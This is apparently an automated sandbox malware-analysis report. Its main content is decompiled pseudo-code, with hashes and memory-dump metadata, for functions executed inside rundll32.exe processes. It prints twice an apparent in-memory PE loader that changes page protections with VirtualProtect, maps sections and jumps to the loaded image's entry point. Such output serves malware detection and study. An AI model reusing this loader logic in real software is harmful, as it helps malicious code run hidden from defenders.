                                                                                                                                                  0x6e9a6da3
                                                                                                                                                  0x6e9a6da6
                                                                                                                                                  0x6e9a6da9

                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.685190249.000000006E9A1000.00000020.00020000.sdmp, Offset: 6E9A0000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.685164563.000000006E9A0000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000001.00000002.685274294.000000006E9BA000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000001.00000002.685296966.000000006E9BD000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000001.00000002.685311272.000000006E9BF000.00000002.00020000.sdmp Download File
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: ef0d3dc98510c0cea0d55b26e3e3d4dda8cce934dd42f54471fab28ea0591a8e
                                                                                                                                                  • Instruction ID: 212ad56d33f0ee27b6f1132f1044fdb148d35398b99528e42e23ebad8e6824b3
                                                                                                                                                  • Opcode Fuzzy Hash: ef0d3dc98510c0cea0d55b26e3e3d4dda8cce934dd42f54471fab28ea0591a8e
                                                                                                                                                  • Instruction Fuzzy Hash: 3511DCF8A19A008F8B58CF49D1908527BF1BF8F31071281AAD8098B365D7B49945CF54
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 6E9ABB44, Relevance: .0, Instructions: 16COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 65%
                                                                                                                                                  			E6E9ABB44(intOrPtr* __ecx) {
				void* _t1;
				void* _t2;
				intOrPtr* _t4;

				_t4 = __ecx;
				_t1 = E6E9AC280(__ecx);
				if(_t1 == 0) {
					_t2 = E6E9B3064(0x60a28c5c, 0xe96b154c);
					if(_t2 != 0) {
						_push( *_t4);
						asm("int3");
						asm("int3");
					}
					 *_t4 = 0;
					return _t2;
				}
				return _t1;
			}






                                                                                                                                                  0x6e9abb45
                                                                                                                                                  0x6e9abb47
                                                                                                                                                  0x6e9abb4e
                                                                                                                                                  0x6e9abb5a
                                                                                                                                                  0x6e9abb61
                                                                                                                                                  0x6e9abb63
                                                                                                                                                  0x6e9abb65
                                                                                                                                                  0x6e9abb66
                                                                                                                                                  0x6e9abb66
                                                                                                                                                  0x6e9abb67
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9abb67
                                                                                                                                                  0x6e9abb6e

                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.685190249.000000006E9A1000.00000020.00020000.sdmp, Offset: 6E9A0000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.685164563.000000006E9A0000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000001.00000002.685274294.000000006E9BA000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000001.00000002.685296966.000000006E9BD000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000001.00000002.685311272.000000006E9BF000.00000002.00020000.sdmp Download File
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 07604e7cfcd7805719c03ee9caa2803b83987aefb0ef9c1b2756fd2519e18e65
                                                                                                                                                  • Instruction ID: 2407438edb059da630a42ca8aa22ae63e16b722afffe3022b5e75e437a7b441e
                                                                                                                                                  • Opcode Fuzzy Hash: 07604e7cfcd7805719c03ee9caa2803b83987aefb0ef9c1b2756fd2519e18e65
                                                                                                                                                  • Instruction Fuzzy Hash: 9CD0127540020A36EF541EEDB820F55B77D5FD0294F240C26AB006B45DFFB5D4614F24
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Analysis Process: rundll32.exe PID: 6340 Parent PID: 6400 rundll32.exeCOMMON

                                                                                                                                                  Executed Functions

                                                                                                                                                  Function 02F411ED, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 230memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 42%
                                                                                                                                                  			E02F411ED(long __ebx, void* __edi, long __esi, intOrPtr* _a4) {
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				char _v44;
				intOrPtr* _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				void* _v68;
				char* _v72;
				int _v76;
				long _v80;
				long _v84;
				DWORD* _v88;
				intOrPtr _v92;
				int _v96;
				intOrPtr* _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				void* _v112;
				intOrPtr _v116;
				char* _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				signed int _v160;
				signed int _v164;
				intOrPtr _v168;
				int _v172;
				char* _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				char _v188;
				intOrPtr* _t137;
				int _t143;
				int _t151;
				int _t155;
				int _t182;
				unsigned int _t199;
				intOrPtr _t221;
				intOrPtr _t223;
				void* _t231;
				intOrPtr _t234;
				void* _t241;
				intOrPtr _t245;
				intOrPtr _t252;
				DWORD* _t265;
				void* _t269;
				intOrPtr* _t272;
				intOrPtr* _t273;

				_t137 = _a4;
				_v44 = 0;
				_t241 =  *((intOrPtr*)(_t137 + 0x38));
				 *0x2f44418 = 1;
				asm("movaps xmm0, [0x2f43010]");
				asm("movups [0x2f44428], xmm0");
				_v48 = _t137;
				_v52 =  *((intOrPtr*)(_t137 + 0x20));
				_v56 =  *((intOrPtr*)(_v48 + 0x1c));
				_v188 = _t241;
				_v184 =  *((intOrPtr*)(_t137 + 0x18));
				_v180 = 4;
				_v176 =  &_v44;
				_v60 =  *((intOrPtr*)(_v48 + 0xc));
				_v64 = 4;
				_v68 = _t241;
				_v72 =  &_v44;
				_t143 = VirtualProtect(__edi, __ebx, __esi, _t265); // executed
				_v76 = _t143;
				_v188 = _v68;
				_v184 = 0;
				_v180 =  *((intOrPtr*)(_v48 + 0x18));
				_v80 = 0x400;
				_v84 = 2;
				_v88 =  &_v44;
				_v92 = 0;
				E02F42798();
				E02F417A5(_v68,  *_v48, _v52);
				E02F42798( *_v48, 0, _v52);
				_t151 = VirtualProtect(_v68, 0x400, 2, _v88); // executed
				_t272 = _t269 - 0x8c;
				_t231 = _v68;
				_t252 =  *((intOrPtr*)(_t231 + 0x3c));
				_v96 = _t151;
				_v100 = _v68 + 0x3c;
				_v104 = _t231;
				_v108 = _t252;
				if(_t252 != 0) {
					_v104 = _v68 + (_v108 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_v144 = _v104;
				if(_v60 != 0) {
					_v148 = _v144 + 0x18 + ( *(_v144 + 0x14) & 0x0000ffff);
					_v152 = 0;
					while(1) {
						_t221 = _v148;
						_t199 =  *(_t221 + 0x24);
						_v156 = _v152;
						_v160 = _t199 >> 0x0000001e & 0x00000001;
						_v164 = _t199 >> 0x1f;
						_v188 = _v68 +  *((intOrPtr*)(_t221 + 0xc));
						_v184 =  *((intOrPtr*)(_t221 + 8));
						_v180 =  *((intOrPtr*)(0x2f44418 + (_v160 << 4) + (_v164 << 3) + ((_t199 >> 0x0000001d & 0x00000001) << 2)));
						_v176 =  &_v44;
						_v168 = _t221;
						_t182 = VirtualProtect(??, ??, ??, ??); // executed
						_t272 = _t272 - 0x10;
						_t223 = _v156 + 1;
						_v172 = _t182;
						_v148 = _v168 + 0x28;
						_v152 = _t223;
						if(_t223 == _v60) {
							goto L5;
						}
					}
				}
				L5:
				 *_t272 = _v68;
				_v116 = _v68 +  *((intOrPtr*)(_v48 + 0x14));
				_t155 = DisableThreadLibraryCalls(??);
				_t273 = _t272 - 4;
				_t234 =  *_v100;
				_v140 = _t155;
				_v136 = _t234;
				_v112 = _v68;
				if(_t234 == 0) {
					L2:
					_t245 = _v48;
					_v40 =  *((intOrPtr*)(_t245 + 0x34));
					_v36 =  *((intOrPtr*)(_t245 + 8));
					_v32 =  *((intOrPtr*)(_t245 + 0x30));
					_v28 =  *((intOrPtr*)(_t245 + 0x28));
					_v24 =  *((intOrPtr*)(_t245 + 0x50));
					_v20 = _v116;
					 *_t273 = _t245;
					_v188 = 0;
					_v184 = 0x74;
					_v120 =  &_v40;
					_v124 = 0;
					_v128 = 0x74;
					_v132 =  *((intOrPtr*)(_v112 + 0x28));
					E02F42798();
					if(_v132 != 0) {
						_t272 =  *((intOrPtr*)( &_v40 + 0x10));
						goto __eax;
					}
					return 1;
				} else {
					_v112 = _v68 + (_v136 + 0x0000ffff & 0x0000ffff) + 1;
					goto L2;
				}
			}































































                                                                                                                                                  0x02f411f9
                                                                                                                                                  0x02f41207
                                                                                                                                                  0x02f4120e
                                                                                                                                                  0x02f41211
                                                                                                                                                  0x02f4121b
                                                                                                                                                  0x02f41222
                                                                                                                                                  0x02f4122c
                                                                                                                                                  0x02f41232
                                                                                                                                                  0x02f4123b
                                                                                                                                                  0x02f41244
                                                                                                                                                  0x02f41247
                                                                                                                                                  0x02f4124b
                                                                                                                                                  0x02f41253
                                                                                                                                                  0x02f4125a
                                                                                                                                                  0x02f4125d
                                                                                                                                                  0x02f41260
                                                                                                                                                  0x02f41263
                                                                                                                                                  0x02f41266
                                                                                                                                                  0x02f41280
                                                                                                                                                  0x02f41286
                                                                                                                                                  0x02f41289
                                                                                                                                                  0x02f41291
                                                                                                                                                  0x02f41295
                                                                                                                                                  0x02f41298
                                                                                                                                                  0x02f4129b
                                                                                                                                                  0x02f4129e
                                                                                                                                                  0x02f412a1
                                                                                                                                                  0x02f412bc
                                                                                                                                                  0x02f412d8
                                                                                                                                                  0x02f412fd
                                                                                                                                                  0x02f412ff
                                                                                                                                                  0x02f41308
                                                                                                                                                  0x02f4130b
                                                                                                                                                  0x02f41315
                                                                                                                                                  0x02f41318
                                                                                                                                                  0x02f4131b
                                                                                                                                                  0x02f4131e
                                                                                                                                                  0x02f41321
                                                                                                                                                  0x02f41535
                                                                                                                                                  0x02f41535
                                                                                                                                                  0x02f4143f
                                                                                                                                                  0x02f41445
                                                                                                                                                  0x02f4140d
                                                                                                                                                  0x02f41413
                                                                                                                                                  0x02f4146c
                                                                                                                                                  0x02f41472
                                                                                                                                                  0x02f41484
                                                                                                                                                  0x02f41487
                                                                                                                                                  0x02f41495
                                                                                                                                                  0x02f414a6
                                                                                                                                                  0x02f414cf
                                                                                                                                                  0x02f414d2
                                                                                                                                                  0x02f414d6
                                                                                                                                                  0x02f414da
                                                                                                                                                  0x02f414e1
                                                                                                                                                  0x02f414e7
                                                                                                                                                  0x02f414e9
                                                                                                                                                  0x02f414f2
                                                                                                                                                  0x02f41503
                                                                                                                                                  0x02f41509
                                                                                                                                                  0x02f4150f
                                                                                                                                                  0x02f41515
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x02f4151b
                                                                                                                                                  0x02f4146c
                                                                                                                                                  0x02f413b8
                                                                                                                                                  0x02f413c6
                                                                                                                                                  0x02f413ce
                                                                                                                                                  0x02f413d1
                                                                                                                                                  0x02f413d3
                                                                                                                                                  0x02f413d9
                                                                                                                                                  0x02f413e5
                                                                                                                                                  0x02f413eb
                                                                                                                                                  0x02f413f1
                                                                                                                                                  0x02f413f4
                                                                                                                                                  0x02f4132c
                                                                                                                                                  0x02f4133c
                                                                                                                                                  0x02f41342
                                                                                                                                                  0x02f41348
                                                                                                                                                  0x02f4134e
                                                                                                                                                  0x02f41354
                                                                                                                                                  0x02f4135a
                                                                                                                                                  0x02f41360
                                                                                                                                                  0x02f41363
                                                                                                                                                  0x02f41366
                                                                                                                                                  0x02f4136e
                                                                                                                                                  0x02f41376
                                                                                                                                                  0x02f41379
                                                                                                                                                  0x02f4137c
                                                                                                                                                  0x02f4137f
                                                                                                                                                  0x02f41382
                                                                                                                                                  0x02f4138d
                                                                                                                                                  0x02f41429
                                                                                                                                                  0x02f4142f
                                                                                                                                                  0x02f4142f
                                                                                                                                                  0x02f41466
                                                                                                                                                  0x02f413fa
                                                                                                                                                  0x02f413b0
                                                                                                                                                  0x00000000
                                                                                                                                                  0x02f413b0

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.399487073.0000000002F40000.00000040.00000010.sdmp, Offset: 02F40000, based on PE: true
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                                  • String ID: t
                                                                                                                                                  • API String ID: 544645111-2238339752
                                                                                                                                                  • Opcode ID: 63589ba064243ceebf3006ec539737a3769eb8e193f0da2c01d4f42009e6699b
                                                                                                                                                  • Instruction ID: a2deb494f934eb27b1c0b686c6a98a36806a1da5b771871f83315a3a8181f759
                                                                                                                                                  • Opcode Fuzzy Hash: 63589ba064243ceebf3006ec539737a3769eb8e193f0da2c01d4f42009e6699b
                                                                                                                                                  • Instruction Fuzzy Hash: 10B1BCB5E002188FDB14CF68C980A9DFBF1FF88314F5585AAE948AB351D774A981CF91
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 02F41D08, Relevance: 1.4, APIs: 1, Instructions: 107memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.399487073.0000000002F40000.00000040.00000010.sdmp, Offset: 02F40000, based on PE: true
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                  • Opcode ID: ebd0c503d5d06981eae4345ed31fc94b0070bc921ad0fa6b450d87fa158e52e2
                                                                                                                                                  • Instruction ID: adb4355536d8dc9cdd955f9f040997d479926552d17784665f5f3806391cfc78
                                                                                                                                                  • Opcode Fuzzy Hash: ebd0c503d5d06981eae4345ed31fc94b0070bc921ad0fa6b450d87fa158e52e2
                                                                                                                                                  • Instruction Fuzzy Hash: 9F41F4B5E0521A9FDB04DF98D890AAEBBF1FF48310F15852DE949AB340D775A844CF84
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Non-executed Functions

                                                                                                                                                  Analysis Process: rundll32.exe PID: 4988 Parent PID: 5696 rundll32.exeCOMMON

                                                                                                                                                  Executed Functions

                                                                                                                                                  Function 00BF11ED, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 230memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 42%
                                                                                                                                                  			E00BF11ED(long __ebx, void* __edi, long __esi, intOrPtr* _a4) {
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				char _v44;
				intOrPtr* _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				void* _v68;
				char* _v72;
				int _v76;
				long _v80;
				long _v84;
				DWORD* _v88;
				intOrPtr _v92;
				int _v96;
				intOrPtr* _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				void* _v112;
				intOrPtr _v116;
				char* _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				signed int _v160;
				signed int _v164;
				intOrPtr _v168;
				int _v172;
				char* _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				char _v188;
				intOrPtr* _t137;
				int _t143;
				int _t151;
				int _t155;
				int _t182;
				unsigned int _t199;
				intOrPtr _t221;
				intOrPtr _t223;
				void* _t231;
				intOrPtr _t234;
				void* _t241;
				intOrPtr _t245;
				intOrPtr _t252;
				DWORD* _t265;
				void* _t269;
				intOrPtr* _t272;
				intOrPtr* _t273;

				_t137 = _a4;
				_v44 = 0;
				_t241 =  *((intOrPtr*)(_t137 + 0x38));
				 *0xbf4418 = 1;
				asm("movaps xmm0, [0xbf3010]");
				asm("movups [0xbf4428], xmm0");
				_v48 = _t137;
				_v52 =  *((intOrPtr*)(_t137 + 0x20));
				_v56 =  *((intOrPtr*)(_v48 + 0x1c));
				_v188 = _t241;
				_v184 =  *((intOrPtr*)(_t137 + 0x18));
				_v180 = 4;
				_v176 =  &_v44;
				_v60 =  *((intOrPtr*)(_v48 + 0xc));
				_v64 = 4;
				_v68 = _t241;
				_v72 =  &_v44;
				_t143 = VirtualProtect(__edi, __ebx, __esi, _t265); // executed
				_v76 = _t143;
				_v188 = _v68;
				_v184 = 0;
				_v180 =  *((intOrPtr*)(_v48 + 0x18));
				_v80 = 0x400;
				_v84 = 2;
				_v88 =  &_v44;
				_v92 = 0;
				E00BF2798();
				E00BF17A5(_v68,  *_v48, _v52);
				E00BF2798( *_v48, 0, _v52);
				_t151 = VirtualProtect(_v68, 0x400, 2, _v88); // executed
				_t272 = _t269 - 0x8c;
				_t231 = _v68;
				_t252 =  *((intOrPtr*)(_t231 + 0x3c));
				_v96 = _t151;
				_v100 = _v68 + 0x3c;
				_v104 = _t231;
				_v108 = _t252;
				if(_t252 != 0) {
					_v104 = _v68 + (_v108 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_v144 = _v104;
				if(_v60 != 0) {
					_v148 = _v144 + 0x18 + ( *(_v144 + 0x14) & 0x0000ffff);
					_v152 = 0;
					while(1) {
						_t221 = _v148;
						_t199 =  *(_t221 + 0x24);
						_v156 = _v152;
						_v160 = _t199 >> 0x0000001e & 0x00000001;
						_v164 = _t199 >> 0x1f;
						_v188 = _v68 +  *((intOrPtr*)(_t221 + 0xc));
						_v184 =  *((intOrPtr*)(_t221 + 8));
						_v180 =  *((intOrPtr*)(0xbf4418 + (_v160 << 4) + (_v164 << 3) + ((_t199 >> 0x0000001d & 0x00000001) << 2)));
						_v176 =  &_v44;
						_v168 = _t221;
						_t182 = VirtualProtect(??, ??, ??, ??); // executed
						_t272 = _t272 - 0x10;
						_t223 = _v156 + 1;
						_v172 = _t182;
						_v148 = _v168 + 0x28;
						_v152 = _t223;
						if(_t223 == _v60) {
							goto L5;
						}
					}
				}
				L5:
				 *_t272 = _v68;
				_v116 = _v68 +  *((intOrPtr*)(_v48 + 0x14));
				_t155 = DisableThreadLibraryCalls(??);
				_t273 = _t272 - 4;
				_t234 =  *_v100;
				_v140 = _t155;
				_v136 = _t234;
				_v112 = _v68;
				if(_t234 == 0) {
					L2:
					_t245 = _v48;
					_v40 =  *((intOrPtr*)(_t245 + 0x34));
					_v36 =  *((intOrPtr*)(_t245 + 8));
					_v32 =  *((intOrPtr*)(_t245 + 0x30));
					_v28 =  *((intOrPtr*)(_t245 + 0x28));
					_v24 =  *((intOrPtr*)(_t245 + 0x50));
					_v20 = _v116;
					 *_t273 = _t245;
					_v188 = 0;
					_v184 = 0x74;
					_v120 =  &_v40;
					_v124 = 0;
					_v128 = 0x74;
					_v132 =  *((intOrPtr*)(_v112 + 0x28));
					E00BF2798();
					if(_v132 != 0) {
						_t272 =  *((intOrPtr*)( &_v40 + 0x10));
						goto __eax;
					}
					return 1;
				} else {
					_v112 = _v68 + (_v136 + 0x0000ffff & 0x0000ffff) + 1;
					goto L2;
				}
			}































































                                                                                                                                                  0x00bf11f9
                                                                                                                                                  0x00bf1207
                                                                                                                                                  0x00bf120e
                                                                                                                                                  0x00bf1211
                                                                                                                                                  0x00bf121b
                                                                                                                                                  0x00bf1222
                                                                                                                                                  0x00bf122c
                                                                                                                                                  0x00bf1232
                                                                                                                                                  0x00bf123b
                                                                                                                                                  0x00bf1244
                                                                                                                                                  0x00bf1247
                                                                                                                                                  0x00bf124b
                                                                                                                                                  0x00bf1253
                                                                                                                                                  0x00bf125a
                                                                                                                                                  0x00bf125d
                                                                                                                                                  0x00bf1260
                                                                                                                                                  0x00bf1263
                                                                                                                                                  0x00bf1266
                                                                                                                                                  0x00bf1280
                                                                                                                                                  0x00bf1286
                                                                                                                                                  0x00bf1289
                                                                                                                                                  0x00bf1291
                                                                                                                                                  0x00bf1295
                                                                                                                                                  0x00bf1298
                                                                                                                                                  0x00bf129b
                                                                                                                                                  0x00bf129e
                                                                                                                                                  0x00bf12a1
                                                                                                                                                  0x00bf12bc
                                                                                                                                                  0x00bf12d8
                                                                                                                                                  0x00bf12fd
                                                                                                                                                  0x00bf12ff
                                                                                                                                                  0x00bf1308
                                                                                                                                                  0x00bf130b
                                                                                                                                                  0x00bf1315
                                                                                                                                                  0x00bf1318
                                                                                                                                                  0x00bf131b
                                                                                                                                                  0x00bf131e
                                                                                                                                                  0x00bf1321
                                                                                                                                                  0x00bf1535
                                                                                                                                                  0x00bf1535
                                                                                                                                                  0x00bf143f
                                                                                                                                                  0x00bf1445
                                                                                                                                                  0x00bf140d
                                                                                                                                                  0x00bf1413
                                                                                                                                                  0x00bf146c
                                                                                                                                                  0x00bf1472
                                                                                                                                                  0x00bf1484
                                                                                                                                                  0x00bf1487
                                                                                                                                                  0x00bf1495
                                                                                                                                                  0x00bf14a6
                                                                                                                                                  0x00bf14cf
                                                                                                                                                  0x00bf14d2
                                                                                                                                                  0x00bf14d6
                                                                                                                                                  0x00bf14da
                                                                                                                                                  0x00bf14e1
                                                                                                                                                  0x00bf14e7
                                                                                                                                                  0x00bf14e9
                                                                                                                                                  0x00bf14f2
                                                                                                                                                  0x00bf1503
                                                                                                                                                  0x00bf1509
                                                                                                                                                  0x00bf150f
                                                                                                                                                  0x00bf1515
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00bf151b
                                                                                                                                                  0x00bf146c
                                                                                                                                                  0x00bf13b8
                                                                                                                                                  0x00bf13c6
                                                                                                                                                  0x00bf13ce
                                                                                                                                                  0x00bf13d1
                                                                                                                                                  0x00bf13d3
                                                                                                                                                  0x00bf13d9
                                                                                                                                                  0x00bf13e5
                                                                                                                                                  0x00bf13eb
                                                                                                                                                  0x00bf13f1
                                                                                                                                                  0x00bf13f4
                                                                                                                                                  0x00bf132c
                                                                                                                                                  0x00bf133c
                                                                                                                                                  0x00bf1342
                                                                                                                                                  0x00bf1348
                                                                                                                                                  0x00bf134e
                                                                                                                                                  0x00bf1354
                                                                                                                                                  0x00bf135a
                                                                                                                                                  0x00bf1360
                                                                                                                                                  0x00bf1363
                                                                                                                                                  0x00bf1366
                                                                                                                                                  0x00bf136e
                                                                                                                                                  0x00bf1376
                                                                                                                                                  0x00bf1379
                                                                                                                                                  0x00bf137c
                                                                                                                                                  0x00bf137f
                                                                                                                                                  0x00bf1382
                                                                                                                                                  0x00bf138d
                                                                                                                                                  0x00bf1429
                                                                                                                                                  0x00bf142f
                                                                                                                                                  0x00bf142f
                                                                                                                                                  0x00bf1466
                                                                                                                                                  0x00bf13fa
                                                                                                                                                  0x00bf13b0
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00bf13b0

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.385753164.0000000000BF0000.00000040.00000001.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                                  • String ID: t
                                                                                                                                                  • API String ID: 544645111-2238339752
                                                                                                                                                  • Opcode ID: eace634c887fde5df4a0b95479205246a737b2b84079743ca2ba914d3a11f7bf
                                                                                                                                                  • Instruction ID: f39c10e3ce5763dfe33d68609946107a4c8322fa48a8fb2da5b3f993cf37acfd
                                                                                                                                                  • Opcode Fuzzy Hash: eace634c887fde5df4a0b95479205246a737b2b84079743ca2ba914d3a11f7bf
                                                                                                                                                  • Instruction Fuzzy Hash: 60B19BB4D00218DFCB14CF69C980AADBBF1BF88314F5585AAE948AB351D730A985CF91
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 00BF1D08, Relevance: 1.4, APIs: 1, Instructions: 107memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.385753164.0000000000BF0000.00000040.00000001.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                  • Opcode ID: ebd0c503d5d06981eae4345ed31fc94b0070bc921ad0fa6b450d87fa158e52e2
                                                                                                                                                  • Instruction ID: 1d9f8b3bd781d6d0b5bfff30c72a82b1190e59b7fe6092bcaf892195f7060b20
                                                                                                                                                  • Opcode Fuzzy Hash: ebd0c503d5d06981eae4345ed31fc94b0070bc921ad0fa6b450d87fa158e52e2
                                                                                                                                                  • Instruction Fuzzy Hash: 3241F2B5E0521ADFDB08DF98D490AAEBBF0FF48310F15896DE949AB340D375A844CB94
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Non-executed Functions